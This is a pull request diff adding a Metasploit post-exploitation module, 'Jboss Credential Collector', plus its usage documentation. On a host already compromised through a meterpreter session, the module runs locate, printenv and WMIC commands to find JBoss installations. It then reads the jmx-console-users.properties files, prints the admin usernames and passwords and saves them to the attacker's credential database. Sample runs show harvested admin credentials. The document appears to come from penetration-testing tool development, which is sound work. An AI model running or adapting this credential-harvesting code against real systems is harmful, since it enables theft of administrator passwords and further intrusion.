### PR TITLE
Added jboss_gather module.

### DIFF
--- a/modules/post/multi/gather/jboss_gather.md
+++ b/modules/post/multi/gather/jboss_gather.md
@@ -1,0 +1,87 @@
+## Creating A Testing Environment
+  For this module to work you need a linux or windows machine.
+  For linux and windows you can download jboss from here the following location: http://jbossas.jboss.org/downloads
+
+This module has been tested against:
+
+  1. Xubuntu 16.04 with jboss 4.23,5.0,5.1 and 6.1.
+  2. Windows 10 with jboss 4.23,5.0,5.1 and 6.1.
+
+This module was not tested against, but may work against:
+
+  1. Other versions of linux running jboss 
+  2. Other version of windows running jboss
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Obtain a meterpreter session via whatever method
+  3. Do: 'use post/multi/gather/jboss_gather'
+  4. Do: 'set session #'
+  5. Do: 'run'
+
+## Scenarios
+
+### Xubuntu 16.04 with jboss 4.23 and 5.1
+
+#### Running with read permissions
+
+    msf post(jboss_gather) > use post/multi/gather/jboss_gather 
+    msf post(jboss_gather) > run
+
+    [*] [2017.03.31-15:12:34] Unix OS detected, attempting to locate Jboss services
+    [*] [2017.03.31-15:12:35] Found a Jboss installation version: 4
+    [*] [2017.03.31-15:12:36] Attempting to extract Jboss service ports from: /home/reaper/jboss-4.2.3.GA/server/all/deploy/jboss-web.deployer/server.xml
+    [*] [2017.03.31-15:12:36] Attempting to extract Jboss service ports from: /home/reaper/jboss-4.2.3.GA/server/default/deploy/jboss-web.deployer/server.xml
+    [+] [2017.03.31-15:12:36] Credentials found - Username: admin Password: admin
+    [+] [2017.03.31-15:12:37] Credentials found - Username: admin Password: admin
+    [*] [2017.03.31-15:12:38] Found a Jboss installation version: 5
+    [*] [2017.03.31-15:12:39] Attempting to extract Jboss service ports from: /home/reaper/jboss-5.1.0.GA/server/all/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
+    [*] [2017.03.31-15:12:39] Attempting to extract Jboss service ports from: /home/reaper/jboss-5.1.0.GA/server/default/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
+    [*] [2017.03.31-15:12:40] Attempting to extract Jboss service ports from: /home/reaper/jboss-5.1.0.GA/server/minimal/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
+    [*] [2017.03.31-15:12:40] Attempting to extract Jboss service ports from: /home/reaper/jboss-5.1.0.GA/server/standard/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
+    [*] [2017.03.31-15:12:40] Attempting to extract Jboss service ports from: /home/reaper/jboss-5.1.0.GA/server/web/conf/bindingservice.beans/META-INF/bindings-jboss-beans.xml
+    [+] [2017.03.31-15:12:41] Credentials found - Username: admin Password: admin
+    [+] [2017.03.31-15:12:41] Credentials found - Username: admin Password: admin
+    [+] [2017.03.31-15:12:41] Credentials found - Username: admin Password: admin
+    [+] [2017.03.31-15:12:41] Credentials found - Username: admin Password: admin
+    [*] Post module execution completed
+
+### Windows 10 with jboss 5.0 and 6.1
+
+#### Running with low permissions
+
+    msf post(jboss_gather) > run
+
+    [*] [2017.03.31-15:13:43] Windows OS detected, enumerating services
+    [*] [2017.03.31-15:13:43] No Jboss service has been found
+    [*] Post module execution completed
+
+#### Running with correct permissions
+    msf post(jboss_gather) > use post/multi/gather/jboss_gather 
+    msf post(jboss_gather) > run
+
+    [*] [2017.03.31-15:44:37] Windows OS detected, enumerating services
+    [*] [2017.03.31-15:44:39] Jboss service found
+    [*] [2017.03.31-15:44:39] Jboss service found
+    [*] [2017.03.31-15:44:39] Found a Jboss installation version: 5
+    [*] [2017.03.31-15:44:41] Attempting to extract Jboss service ports from: C:\Users\Reaper\Desktop\jboss-5.1.0.GA\jboss-5.1.0.GA\server\all\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
+    [*] [2017.03.31-15:44:41] Attempting to extract Jboss service ports from: C:\Users\Reaper\Desktop\jboss-5.1.0.GA\jboss-5.1.0.GA\server\default\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
+    [*] [2017.03.31-15:44:42] Attempting to extract Jboss service ports from: C:\Users\Reaper\Desktop\jboss-5.1.0.GA\jboss-5.1.0.GA\server\minimal\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
+    [*] [2017.03.31-15:44:42] Attempting to extract Jboss service ports from: C:\Users\Reaper\Desktop\jboss-5.1.0.GA\jboss-5.1.0.GA\server\standard\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
+    [*] [2017.03.31-15:44:43] Attempting to extract Jboss service ports from: C:\Users\Reaper\Desktop\jboss-5.1.0.GA\jboss-5.1.0.GA\server\web\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
+    [+] [2017.03.31-15:44:43] Credentials found - Username: admin Password: admin
+    [+] [2017.03.31-15:44:44] Credentials found - Username: admin Password: admin
+    [+] [2017.03.31-15:44:44] Credentials found - Username: admin Password: admin
+    [+] [2017.03.31-15:44:44] Credentials found - Username: admin Password: admin
+    [*] [2017.03.31-15:44:45] Found a Jboss installation version: 6
+    [*] [2017.03.31-15:44:46] Attempting to extract Jboss service ports from: C:\Users\Reaper\Desktop\jboss-6.1.0.Final\server\all\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
+    [*] [2017.03.31-15:44:47] Attempting to extract Jboss service ports from: C:\Users\Reaper\Desktop\jboss-6.1.0.Final\server\default\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
+    [*] [2017.03.31-15:44:48] Attempting to extract Jboss service ports from: C:\Users\Reaper\Desktop\jboss-6.1.0.Final\server\jbossweb-standalone\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
+    [*] [2017.03.31-15:44:48] Attempting to extract Jboss service ports from: C:\Users\Reaper\Desktop\jboss-6.1.0.Final\server\minimal\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
+    [*] [2017.03.31-15:44:49] Attempting to extract Jboss service ports from: C:\Users\Reaper\Desktop\jboss-6.1.0.Final\server\standard\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml
+    [+] [2017.03.31-15:44:49] Credentials found - Username: admin Password: admin
+    [+] [2017.03.31-15:44:49] Credentials found - Username: admin Password: admin
+    [+] [2017.03.31-15:44:50] Credentials found - Username: admin Password: admin
+    [+] [2017.03.31-15:44:50] Credentials found - Username: admin Password: admin
+    [*] Post module execution completed

--- a/modules/post/multi/gather/jboss_gather.rb
+++ b/modules/post/multi/gather/jboss_gather.rb
@@ -1,0 +1,255 @@
+require 'msf/core'
+require 'nokogiri'
+
+class MetasploitModule < Msf::Post
+    include Msf::Post::File
+    include Msf::Post::Linux::System
+
+    def initialize(info={})
+    super(update_info(info,
+        'Name'          => 'Jboss Credential Collector',
+        'Description'   => %q{
+          This module can be used to extract the Jboss admin passwords for version 4,5 and 6.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Koen Riepe (koen.riepe@fox-it.com)' ],
+        'Platform'      => [ 'linux', 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+    ))
+    end
+
+    def report_creds(user, pass, port)
+        return if (user.empty? or pass.empty?)
+            # Assemble data about the credential objects we will be creating
+            credential_data = {
+                origin_type: :session,
+                post_reference_name: self.fullname,
+                private_data: pass,
+                private_type: :password,
+                session_id: session_db_id,
+                username: user,
+                workspace_id: myworkspace_id,
+            }
+
+            credential_core = create_credential(credential_data)
+
+            if not port.is_a? Integer
+                print_status("Port not an Integer, Something probably went wrong")
+                port = 8080
+            end
+
+            login_data = {
+                core: credential_core,
+                status: Metasploit::Model::Login::Status::UNTRIED,
+                address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+                port: port,
+                service_name: 'jboss',
+                protocol: 'tcp',
+                workspace_id: myworkspace_id
+            }
+            create_credential_login(login_data)
+    end
+
+    def getpw(file, ports)
+        i = 0
+        file.each do |pwfile|
+            lines = read_file(pwfile).split("\n")
+              for line in lines
+                  if not line.include? "#"
+                      creds = line.split("=")
+                      print_good("Username: " + creds[0] + " Password: " + creds[1])
+                      report_creds(creds[0],creds[1],ports[i])
+                  end
+              end
+              i+=1
+        end
+    end
+
+    def getversion(array)
+        i = 0
+        version = "NONE"
+        results = Array.new
+        while i < array.count
+            downcase = array[i].downcase
+            if downcase.include? "jboss"
+                file = read_file(array[i])
+                xml_doc  = Nokogiri::XML(file)
+                xml_doc.xpath("//jar-versions//jar").each do |node|
+                    if node["name"] == "jbossweb.jar"
+                        version = node["specVersion"][0]
+                        results.push(version)
+                    end
+                end
+            end
+            if not version == "NONE"
+                print_status("Found a Jboss installation version:" + version)
+            end
+            i+=1
+        end
+        return results
+    end
+
+    def readhome(array)
+        home = ""
+        array.each do |item|
+            if item.include? "JBOSS_HOME"
+                home = item.split("JBOSS_HOME=")[1]
+            end
+        end
+        return home
+    end
+
+    def getpwfiles(array,home)
+        pwfiles = Array.new
+        array.each do |location|
+            if location.include? home
+                pwfiles.push(location)
+            end
+        end
+        return pwfiles
+    end
+
+    def getports()
+        type1 = cmd_exec('locate bindings-jboss-beans.xml').split("\n")
+        type2 = cmd_exec('locate jboss-web.deployer/server.xml').split("\n")
+        port = Array.new
+
+        type1.each do |file1|
+            print_status("Bind file found: " + file1)
+            xml1  = Nokogiri::XML(read_file(file1))
+            xml1.css("//deployment//bean//constructor//parameter//bean").each do |connector|
+                if connector.css("property[name='serviceName']").text == "jboss.web:service=WebServer"
+                    port.push(connector.css("property[name='port']").text.to_i)
+                    break
+                end
+            end
+        end
+
+        type2.each do |file2|
+            print_status("Bind file found: " + file2)
+            xml2  = Nokogiri::XML(read_file(file2))
+            xml2.xpath("//Server//Connector").each do |connector|
+                if connector['protocol'].include? "HTTP"
+                    port.push(connector['port'].to_i)
+                    break
+                end
+            end
+        end
+        return port
+    end
+
+    def gathernix()
+        print_status("Unix OS detected, attempting to locate Jboss services")
+        version = getversion(cmd_exec('locate jar-versions.xml').split("\n"))
+          home = readhome(cmd_exec('printenv').split("\n"))
+          pwfiles = getpwfiles(cmd_exec('locate jmx-console-users.properties').split("\n"),home)
+          listenports = getports()
+          getpw(pwfiles,listenports)
+    end
+
+    def winhome()
+        exec = cmd_exec('WMIC PROCESS get Caption,Commandline').split("\n")
+           exec.each do |line|
+               if line.downcase.include? "java.exe" and line.downcase.include? "jboss"
+                   print_status("Jboss process found")
+                   home = line.split('-classpath "')[1].split("\\bin\\")[0]
+                   return home
+               end
+           end
+       end
+
+       def wingetinstances(home)
+           instances = Array.new
+           instance_location = home + "\\server"
+           exec = cmd_exec('cmd /c dir ' + instance_location).split("\n")
+           exec.each do |instance|
+               if instance.split("<DIR>")[1]
+                   if (not instance.split("<DIR>")[1].strip().include? ".") and (not instance.split("<DIR>")[1].strip().include? "..")
+                       instance_path = home + "\\server\\" + (instance.split("<DIR>")[1].strip())
+                       instances.push(instance_path)
+                   end
+               end
+           end
+           return instances
+       end
+
+       def winpwfiles(instances)
+           files = Array.new
+           instances.each do |seed|
+               file_path = seed + "\\conf\\props\\jmx-console-users.properties"
+               if exist?(file_path)
+                   files.push(file_path)
+               end
+           end
+           return files
+       end
+
+       def wingetport(instances)
+           port = Array.new
+
+        instances.each do |seed|
+            path1 = seed + "\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml"
+            path2 = seed + "\\deploy\\jboss-web.deployer\\server.xml"
+
+            if exist?(path1)
+                file1 = read_file(seed + "\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml").split("\n")
+            end
+
+            if exist?(path2)
+                file2 = read_file(seed + "\\deploy\\jboss-web.deployer\\server.xml")
+            end
+
+            if file1
+                print_status("Bind file found: " + seed + "\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml")
+                parse = false
+                nextport = false
+                file1.each do |line|
+                    if line.strip() == '<bean class="org.jboss.services.binding.ServiceBindingMetadata">'
+                        parse = true
+                    elsif line.strip() == '</bean>'
+                        parse = false
+                    elsif parse and line.include? "HttpConnector"
+                        nextport = true
+                    elsif parse and nextport
+                        port.push(line.split('<property name="port">')[1].split('<')[0].to_i)
+                        nextport = false
+                    end
+                end
+            end
+
+            if file2
+                print_status("Bind file found: " + seed + "\\deploy\\jboss-web.deployer\\server.xml")
+                xml2  = Nokogiri::XML(file2)
+                xml2.xpath("//Server//Connector").each do |connector|
+                    if connector['protocol'].include? "HTTP"
+                        print_status(connector['port'])
+                        port.push(connector['port'].to_i)
+                        break
+                    end
+                end
+            end
+        end
+        return port
+       end
+
+    def gatherwin()
+        print_status("Windows OS detected, enumerating services")
+        home = winhome()
+        version_file = Array.new
+        version_file.push(home + "\\jar-versions.xml")
+        version = getversion(version_file)
+        instances = wingetinstances(home)
+        pwfiles = winpwfiles(instances)
+        listenports = wingetport(instances)
+        getpw(pwfiles,listenports)
+    end
+
+    def run
+        if sysinfo['OS'].include? "Windows"
+          gatherwin()
+        else
+          gathernix()
+        end
+    end
+
+end

--- a/modules/post/multi/gather/jboss_gather.rb
+++ b/modules/post/multi/gather/jboss_gather.rb
@@ -126,7 +126,7 @@ class MetasploitModule < Msf::Post
         getpw(pwfiles,listenports)
       end
       i+=1
-    end    
+    end
   end
 
   def readhome(array)

--- a/modules/post/multi/gather/jboss_gather.rb
+++ b/modules/post/multi/gather/jboss_gather.rb
@@ -2,266 +2,316 @@ require 'msf/core'
 require 'nokogiri'
 
 class MetasploitModule < Msf::Post
-    include Msf::Post::File
-    include Msf::Post::Linux::System
+  include Msf::Post::File
+  include Msf::Post::Linux::System
 
-    def initialize(info={})
+  def initialize(info={})
     super(update_info(info,
-        'Name'          => 'Jboss Credential Collector',
-        'Description'   => %q{
-          This module can be used to extract the Jboss admin passwords for version 4,5 and 6.
-        },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Koen Riepe (koen.riepe@fox-it.com)' ],
-        'Platform'      => [ 'linux', 'win' ],
-        'SessionTypes'  => [ 'meterpreter' ]
+      'Name'      => 'Jboss Credential Collector',
+      'Description'   => %q{
+        This module can be used to extract the Jboss admin passwords for version 4,5 and 6.
+      },
+      'License'     => MSF_LICENSE,
+      'Author'    => [ 'Koen Riepe (koen.riepe@fox-it.com)' ],
+      'Platform'    => [ 'linux', 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ]
     ))
-    end
+  end
 
-    def report_creds(user, pass, port)
-        return if (user.empty? or pass.empty?)
-            # Assemble data about the credential objects we will be creating
-            credential_data = {
-                origin_type: :session,
-                post_reference_name: self.fullname,
-                private_data: pass,
-                private_type: :password,
-                session_id: session_db_id,
-                username: user,
-                workspace_id: myworkspace_id,
-            }
+  def report_creds(user, pass, port)
+    return if (user.empty? or pass.empty?)
+      # Assemble data about the credential objects we will be creating
+      credential_data = {
+        origin_type: :session,
+        post_reference_name: self.fullname,
+        private_data: pass,
+        private_type: :password,
+        session_id: session_db_id,
+        username: user,
+        workspace_id: myworkspace_id,
+      }
 
-            credential_core = create_credential(credential_data)
+      credential_core = create_credential(credential_data)
 
-            if not port.is_a? Integer
-                print_status("Failed to detect port, defaulting to 8080 for creds database")
-                port = 8080
-            end
+      if not port.is_a? Integer
+        print_status('Failed to detect port, defaulting to 8080 for creds database')
+        port = 8080
+      end
 
-            login_data = {
-                core: credential_core,
-                status: Metasploit::Model::Login::Status::UNTRIED,
-                address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
-                port: port,
-                service_name: 'jboss',
-                protocol: 'tcp',
-                workspace_id: myworkspace_id
-            }
-            create_credential_login(login_data)
-    end
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED,
+        address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
+        port: port,
+        service_name: 'jboss',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+      }
+      create_credential_login(login_data)
+  end
 
-    def getpw(file, ports)
-        i = 0
-        file.each do |pwfile|
-            lines = read_file(pwfile).split("\n")
-              for line in lines
-                  if not line.include? "#"
-                      creds = line.split("=")
-                      print_good("Username: " + creds[0] + " Password: " + creds[1])
-                      report_creds(creds[0],creds[1],ports[i])
-                  end
-              end
-              i+=1
+  def getpw(file, ports)
+    i = 0
+    file.each do |pwfile|
+      begin
+        lines = read_file(pwfile).split("\n")
+      rescue
+        print_error("Cannot open #{array[i]}, you probably don't have permissions to open the file.")
+        next
+      end
+      for line in lines
+        if not line.include? "#"
+          creds = line.split("=")
+          print_good("Credentials found - Username: #{creds[0]} Password: #{creds[1]}")
+          report_creds(creds[0], creds[1], ports[i])
         end
+      end
+      i+=1
     end
+  end
 
-    def getversion(array)
-        i = 0
-        version = "NONE"
-        results = Array.new
-        while i < array.count
-            downcase = array[i].downcase
-            if downcase.include? "jboss"
-                file = read_file(array[i])
-                xml_doc  = Nokogiri::XML(file)
-                xml_doc.xpath("//jar-versions//jar").each do |node|
-                    if node["name"] == "jbossweb.jar"
-                        version = node["specVersion"][0]
-                        results.push(version)
-                    end
-                end
-            end
-            if not version == "NONE"
-                print_status("Found a Jboss installation version:" + version)
-            end
-            i+=1
+  def getversion(array)
+    i = 0
+    version = "NONE"
+    results = []
+    while i < array.count
+      downcase = array[i].downcase
+      if downcase.include? "jboss"
+        begin
+          file = read_file(array[i])
+        rescue
+          print_error("Cannot open #{array[i]}, you probably don't have permissions to open the file.")
+          next
         end
-        return results
-    end
-
-    def readhome(array)
-        home = ""
-        array.each do |item|
-            if item.include? "JBOSS_HOME"
-                home = item.split("JBOSS_HOME=")[1]
-            end
+        xml_doc = Nokogiri::XML(file)
+        xml_doc.xpath("//jar-versions//jar").each do |node|
+          if node["name"] == "jbossweb.jar"
+            version = node["specVersion"][0]
+            results.push(version)
+          end
         end
-        return home
-    end
-
-    def getpwfiles(array,home)
-        pwfiles = Array.new
-        array.each do |location|
-            if location.include? home
-                pwfiles.push(location)
-            end
-        end
-        return pwfiles
-    end
-
-    def getports()
-        type1 = cmd_exec('locate bindings-jboss-beans.xml').split("\n")
-        type2 = cmd_exec('locate jboss-web.deployer/server.xml').split("\n")
-        port = Array.new
-
-        type1.each do |file1|
-            print_status("Bind file found: " + file1)
-            xml1  = Nokogiri::XML(read_file(file1))
-            xml1.css("//deployment//bean//constructor//parameter//bean").each do |connector|
-                if connector.css("property[name='serviceName']").text == "jboss.web:service=WebServer"
-                    port.push(connector.css("property[name='port']").text.to_i)
-                    break
-                end
-            end
-        end
-
-        type2.each do |file2|
-            print_status("Bind file found: " + file2)
-            xml2  = Nokogiri::XML(read_file(file2))
-            xml2.xpath("//Server//Connector").each do |connector|
-                if connector['protocol'].include? "HTTP"
-                    port.push(connector['port'].to_i)
-                    break
-                end
-            end
-        end
-        return port
-    end
-
-    def gathernix()
-        print_status("Unix OS detected, attempting to locate Jboss services")
-        version = getversion(cmd_exec('locate jar-versions.xml').split("\n"))
+      end
+      if not version == "NONE"
+        print_status("Found a Jboss installation version: #{version}")
         home = readhome(cmd_exec('printenv').split("\n"))
-        pwfiles = getpwfiles(cmd_exec('locate jmx-console-users.properties').split("\n"),home)
-        listenports = getports()
+        pwfiles = getpwfiles(cmd_exec('locate jmx-console-users.properties').split("\n"), home, version)
+        listenports = getports(version)
         getpw(pwfiles,listenports)
+      end
+      i+=1
     end
+  end
 
-    def winhome()
-        home = Array.new
-        exec = cmd_exec('WMIC PROCESS get Caption,Commandline').split("\n")
-           exec.each do |line|
-                if line.downcase.include? "java.exe" and line.downcase.include? "jboss"
-                    print_status("Jboss service found")
-                    parse = line.split('-classpath "')[1].split("\\bin\\")[0]
-                    if parse[0] == ';'
-                        home.push(parse.split(';')[1])
-                    else
-                        home.push(parse)
-                    end
-                end
-           end
-        return home
+  def wingetversion(array, home)
+    i = 0
+    version = "NONE"
+    results = []
+    while i < array.count
+      downcase = array[i].downcase
+      if downcase.include? "jboss"
+        file = read_file(array[i])
+        xml_doc = Nokogiri::XML(file)
+        xml_doc.xpath("//jar-versions//jar").each do |node|
+          if node["name"] == "jbossweb.jar"
+            version = node["specVersion"][0]
+            results.push(version)
+          end
+        end
+      end
+      if not version == "NONE"
+        print_status("Found a Jboss installation version: #{version}")
+        instances = wingetinstances(home,version)
+        pwfiles = winpwfiles(instances)
+        listenports = wingetport(instances)
+        getpw(pwfiles,listenports)
+      end
+      i+=1
+    end    
+  end
+
+  def readhome(array)
+    home = ""
+    array.each do |item|
+      if item.include? "JBOSS_HOME"
+        home = item.split("JBOSS_HOME=")[1]
+      end
     end
+    return home
+  end
 
-    def wingetinstances(home)
-       instances = Array.new
-       instance_location = home + "\\server"
-       exec = cmd_exec('cmd /c dir ' + instance_location).split("\n")
-       exec.each do |instance|
-           if instance.split("<DIR>")[1]
-               if (not instance.split("<DIR>")[1].strip().include? ".") and (not instance.split("<DIR>")[1].strip().include? "..")
-                   instance_path = home + "\\server\\" + (instance.split("<DIR>")[1].strip())
-                   instances.push(instance_path)
-               end
-           end
-       end
-       return instances
+  def getpwfiles(array, home, version)
+    pwfiles = []
+    array.each do |location|
+      if location.include? (home and version)
+        pwfiles.push(location)
+      end
     end
+    return pwfiles
+  end
 
-    def winpwfiles(instances)
-       files = Array.new
-       instances.each do |seed|
-           file_path = seed + "\\conf\\props\\jmx-console-users.properties"
-           if exist?(file_path)
-               files.push(file_path)
-           end
-       end
-       return files
+  def getports(version)
+    type1 = cmd_exec('locate bindings-jboss-beans.xml').split("\n")
+    type2 = cmd_exec('locate jboss-web.deployer/server.xml').split("\n")
+    port = []
+
+    type1.each do |file1|
+      if file1 and file1.include? version
+        print_status("Attempting to extract Jboss service ports from: #{file1}")
+        begin
+          file1_read = read_file(file1).split("\n")
+        rescue
+          print_error("Cannot open #{array[i]}, you probably don't have permissions to open the file.")
+          next
+        end
+        parse = false
+        portfound = false
+        file1_read.each do |line|
+        if line.strip.include? 'deploy/httpha-invoker.sar'
+          parse = true
+        elsif (line.strip == '</bean>' and portfound)
+          parse = false
+        elsif parse and line.include? '<property name="port">'
+          port.push(line.split('<property name="port">')[1].split('<')[0].to_i)
+          portfound = true
+        end
+      end
     end
+  end
 
-    def wingetport(instances)
-       port = Array.new
-
-    instances.each do |seed|
-        path1 = seed + "\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml"
-        path2 = seed + "\\deploy\\jboss-web.deployer\\server.xml"
-
-        if exist?(path1)
-            file1 = read_file(seed + "\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml").split("\n")
+    type2.each do |file2|
+      if file2 and file2.include? version
+        print_status("Attempting to extract Jboss service ports from: #{file2}")
+        begin
+          xml2  = Nokogiri::XML(read_file(file2))
+        rescue
+          print_error("Cannot open #{array[i]}, you probably don't have permissions to open the file.")
+          next
         end
-
-        if exist?(path2)
-            file2 = read_file(seed + "\\deploy\\jboss-web.deployer\\server.xml")
+        xml2.xpath("//Server//Connector").each do |connector|
+          if connector['protocol'].include? "HTTP"
+            port.push(connector['port'].to_i)
+            break
+          end
         end
-
-        if file1
-            print_status("Bind file found: " + seed + "\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml")
-            parse = false
-            nextport = false
-            file1.each do |line|
-                if line.strip() == '<bean class="org.jboss.services.binding.ServiceBindingMetadata">'
-                    parse = true
-                elsif line.strip() == '</bean>'
-                    parse = false
-                elsif parse and line.include? "HttpConnector"
-                    nextport = true
-                elsif parse and nextport
-                    port.push(line.split('<property name="port">')[1].split('<')[0].to_i)
-                    nextport = false
-                    print_status(line.split('<property name="port">')[1].split('<')[0])
-                end
-            end
-        end
-
-        if file2
-            print_status("Bind file found: " + seed + "\\deploy\\jboss-web.deployer\\server.xml")
-            xml2  = Nokogiri::XML(file2)
-            xml2.xpath("//Server//Connector").each do |connector|
-                if connector['protocol'].include? "HTTP"
-                    print_status(connector['port'])
-                    port.push(connector['port'].to_i)
-                    break
-                end
-            end
-        end
+      end
     end
     return port
-    end
+  end
 
-    def gatherwin()
-        print_status("Windows OS detected, enumerating services")
-        homeArray = winhome()
-        if homeArray.size > 0
-            homeArray.each do |home|
-                version_file = Array.new
-                version_file.push(home + "\\jar-versions.xml")
-                version = getversion(version_file)
-                instances = wingetinstances(home)
-                pwfiles = winpwfiles(instances)
-                listenports = wingetport(instances)
-                getpw(pwfiles,listenports)
-            end
-        else
-            print_status("No Jboss service has been found")
-        end
-    end
+  def gathernix
+    print_status('Unix OS detected, attempting to locate Jboss services')
+    version = getversion(cmd_exec('locate jar-versions.xml').split("\n"))
+  end
 
-    def run
-        if sysinfo['OS'].include? "Windows"
-          gatherwin()
-        else
-          gathernix()
+  def winhome
+    home = []
+    exec = cmd_exec('WMIC PROCESS get Caption,Commandline').split("\n")
+      exec.each do |line|
+        if line.downcase.include? "java.exe" and line.downcase.include? "jboss"
+          print_status('Jboss service found')
+          parse = line.split('-classpath "')[1].split("\\bin\\")[0]
+          if parse[0] == ';'
+            home.push(parse.split(';')[1])
+          else
+            home.push(parse)
+          end
         end
+      end
+    return home
+  end
+
+  def wingetinstances(home, version)
+    instances = []
+    instance_location = "#{home}\\server"
+    exec = cmd_exec("cmd /c dir #{instance_location}").split("\n")
+    exec.each do |instance|
+     if instance.split("<DIR>")[1]
+       if (not instance.split("<DIR>")[1].strip.include? ".") and (not instance.split("<DIR>")[1].strip.include? "..")
+         instance_path = "#{home}\\server\\#{(instance.split("<DIR>")[1].strip)}"
+         if instance_path.include? version
+           instances.push(instance_path)
+         end
+       end
+     end
     end
+    return instances
+  end
+
+  def winpwfiles(instances)
+    files = []
+    instances.each do |seed|
+     file_path = "#{seed}\\conf\\props\\jmx-console-users.properties"
+     if exist?(file_path)
+       files.push(file_path)
+     end
+    end
+    return files
+  end
+
+  def wingetport(instances)
+    port = []
+    instances.each do |seed|
+      path1 = "#{seed}\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml"
+      path2 = "#{seed}\\deploy\\jboss-web.deployer\\server.xml"
+
+      if exist?(path1)
+        file1 = read_file("#{seed}\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml").split("\n")
+      end
+
+      if exist?(path2)
+        file2 = read_file("#{seed}\\deploy\\jboss-web.deployer\\server.xml")
+      end
+
+      if file1
+        print_status("Attempting to extract Jboss service ports from: #{seed}\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml")
+        parse = false
+        portfound = false
+        file1.each do |line|
+          if line.strip.include? 'deploy/httpha-invoker.sar'
+            parse = true
+          elsif (line.strip == '</bean>' and portfound)
+            parse = false
+          elsif parse and line.include? '<property name="port">'
+            port.push(line.split('<property name="port">')[1].split('<')[0].to_i)
+            portfound = true
+          end
+        end
+      end
+
+      if file2
+        print_status("Attempting to extract Jboss service ports from: #{seed}\\deploy\\jboss-web.deployer\\server.xml")
+        xml2  = Nokogiri::XML(file2)
+        xml2.xpath("//Server//Connector").each do |connector|
+          if connector['protocol'].include? "HTTP"
+            print_status(connector['port'])
+            port.push(connector['port'].to_i)
+            break
+          end
+        end
+      end
+    end
+  return port
+  end
+
+  def gatherwin
+    print_status('Windows OS detected, enumerating services')
+    homeArray = winhome
+    if homeArray.size > 0
+      homeArray.each do |home|
+        version_file = []
+        version_file.push("#{home}\\jar-versions.xml")
+        version = wingetversion(version_file, home)
+      end
+    else
+      print_status('No Jboss service has been found')
+    end
+  end
+
+  def run
+    if sysinfo['OS'].include? "Windows"
+      gatherwin
+    else
+      gathernix
+    end
+  end
 end

--- a/modules/post/multi/gather/jboss_gather.rb
+++ b/modules/post/multi/gather/jboss_gather.rb
@@ -5,17 +5,19 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Linux::System
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'      => 'Jboss Credential Collector',
-      'Description'   => %q{
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name' => 'Jboss Credential Collector',
+      'Description' => %q(
         This module can be used to extract the Jboss admin passwords for version 4,5 and 6.
-      },
-      'License'     => MSF_LICENSE,
-      'Author'    => [ 'Koen Riepe (koen.riepe@fox-it.com)' ],
-      'Platform'    => [ 'linux', 'win' ],
-      'SessionTypes'  => [ 'meterpreter' ]
-    ))
+      ),
+      'License' => MSF_LICENSE,
+      'Author' => [ 'Koen Riepe (koen.riepe@fox-it.com)' ],
+      'Platform' => [ 'linux', 'win' ],
+      'SessionTypes' => [ 'meterpreter' ]
+    )
+    )
   end
 
   def report_creds(user, pass, port)
@@ -56,7 +58,7 @@ class MetasploitModule < Msf::Post
       begin
         lines = read_file(pwfile).split("\n")
       rescue
-        print_error("Cannot open #{array[i]}, you probably don't have permissions to open the file.")
+        print_error("Cannot open #{pwfile}, you probably don't have permissions to open the file.")
         next
       end
       for line in lines
@@ -66,7 +68,7 @@ class MetasploitModule < Msf::Post
           report_creds(creds[0], creds[1], ports[i])
         end
       end
-      i+=1
+      i += 1
     end
   end
 
@@ -120,12 +122,12 @@ class MetasploitModule < Msf::Post
       end
       if not version == "NONE"
         print_status("Found a Jboss installation version: #{version}")
-        instances = wingetinstances(home,version)
+        instances = wingetinstances(home, version)
         pwfiles = winpwfiles(instances)
         listenports = wingetport(instances)
-        getpw(pwfiles,listenports)
+        getpw(pwfiles, listenports)
       end
-      i+=1
+      i += 1
     end
   end
 
@@ -153,14 +155,13 @@ class MetasploitModule < Msf::Post
     type1 = cmd_exec('locate bindings-jboss-beans.xml').split("\n")
     type2 = cmd_exec('locate jboss-web.deployer/server.xml').split("\n")
     port = []
-
     type1.each do |file1|
       if file1 and file1.include? version
         print_status("Attempting to extract Jboss service ports from: #{file1}")
         begin
           file1_read = read_file(file1).split("\n")
         rescue
-          print_error("Cannot open #{array[i]}, you probably don't have permissions to open the file.")
+          print_error("Cannot open #{file1}, you probably don't have permissions to open the file.")
           next
         end
         parse = false
@@ -182,9 +183,9 @@ class MetasploitModule < Msf::Post
       if file2 and file2.include? version
         print_status("Attempting to extract Jboss service ports from: #{file2}")
         begin
